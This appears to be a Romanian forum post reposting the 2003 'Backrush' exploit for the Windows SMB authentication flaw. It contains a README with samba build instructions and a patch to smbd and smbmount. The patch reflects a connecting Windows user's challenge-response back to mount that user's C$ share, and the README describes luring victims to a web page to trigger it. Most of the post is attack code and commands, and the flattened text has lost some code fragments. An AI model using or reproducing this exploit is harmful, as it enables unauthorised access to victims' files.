Shineva o inshercat sa se pricaleasca din *nix de iuzerii din windows cu sharefacku ista ? :)
Shineva o inshercat sa se pricaleasca din *nix de iuzerii din windows cu sharefacku ista ? :) * README * ########################################### Exploit for "Authentication flaw in Windows SMB protocol" ############################################ Release Date: # April 24, 2003 # # Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir) # Salman Niksefat (salman@linux.ce.aut.ac.ir) # # Systems Affected by this exploit: # Windows 2000 (SP0 SP1 SP2 SP3) # Windows XP (SP0 SP1) # # EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT # WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE. ##########################################This exploit is based on samba-2.2.8a, you can download the source code from:http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2or other mirrors.First you should configure and make samba source code as follow:You need first to extract the file:$ tar -jxf samba-2.2.8a.tar.bz2$ cd samba-2.2.8a/sourceHere you need to configure with suitable options. Here is a config for RedHat 9:$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages--with-lockdir=/var/cache/samba --with-configdir=/etc/samba$ make$ make bin/smbmount$ su# make installFirst add an arbitary user to samba: (Choose a reliable password for it for your protection!)# smbadduser smbtmpuser:rootNow check if your samba server(bin/smbd) and client(bin/smbmount) are working, and that ipchains rulls are not set. you can use:# service smbd stop# bin/smbd -i# ipchains -FWell, now if everything works fine, you can apply the exploit code to the source.Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch# patch 2. Invite him/her to visit your personal web page.You can make it by the above tag, then pray and wait until he/she visits your page. ;)Enjoy! * backrush.patch * diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430@@ -26,6 +26,10 @@#include #include #include +//>Backrush+int br_read[2], br_write[2], br_pid;+struct Backrush br_state;+// Backrush+ {+ int i;+ printf("challange: ");+ for (i = 0; i cryptkey[i]);+ fflush(stdout);+ memcpy(br_state.challenge, c->cryptkey, 8);+ br_state.status = 1;+ write(br_write[1],&br_state, sizeof(br_state));+ printf(" sent to server\n");+ printf("waiting for response...\n");+ fflush(stdout); + }+// Backrush+ printf("Started to mount %s on %s\n",argv[1], argv[2]);+ fflush(stdout);+ if (getenv("BACKRUSH_READ")) + br_read[0] = atoi(getenv("BACKRUSH_READ"));+ if (getenv("BACKRUSH_WRITE"))+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));+// Backrush+#include +#include +struct Backrush+{+ int status;+ char ip_address[20];+ int port;+ char username[256];+ char sharename[256];+ char netbios[256];+ char domain[256];+ char challenge[8];+ char nt_resp[24];+ char lm_resp[24];+};+extern struct Backrush br_state;+extern int br_read[2],br_write[2],br_pid;+//Backrush+ {+ int i;+ read(br_read[0],&br_state, sizeof(br_state));+ printf("received response:\n");+ fflush(stdout);+ memcpy(pword, br_state.lm_resp, 24);+ memcpy(ntpword, br_state.nt_resp, 24);+ if(br_state.username[0])+ strncpy(user, br_state.username, 24);+ printf("username: %s\n", user);+ printf("lm response: ");+ for (i = 0; i outbuf,'\0',smb_size);diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430@@ -180,6 +180,45 @@doencrypt = ((cli->sec_mode & 2) != 0);}+//>Backrush+ {+ srand(time(NULL));+ pipe(br_read);+ pipe(br_write);+ br_state.status = 1;+ br_state.port = random();+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));+ {+ char tmp[1024], *ptr;+ FILE *fin = fopen("backrush/ip2sharename.map","r");+ if (fin)+ {+ while(fscanf(fin, "%s", tmp) > 0)+ {+ ptr = strchr(tmp, ':');+ *ptr++ = 0;+ if (!strcmp(br_state.ip_address,tmp))+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));+ }+ fclose(fin);+ }+ }+ if (!(br_pid = fork()))+ {+ char cmd[1024];+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ _exit(0);+ }+ }+//Backrush+ read(br_read[0],&br_state, sizeof(br_state));+ memcpy(buf, br_state.challenge, 8);+// Backrush+ memcpy(br_state.nt_resp, nt_pass, 24);+ memcpy(br_state.lm_resp, lm_pass, 24);+ write(br_write[1],&br_state, sizeof(br_state));+// waitpid(br_pid,NULL,WNOHANG);+ return(False);+//Backrush + strncpy(br_state.username,user,sizeof(br_state.username));+ strncpy(user,"root",sizeof(br_state.username));+//+int am_parent = 1;/* the last message the was processed */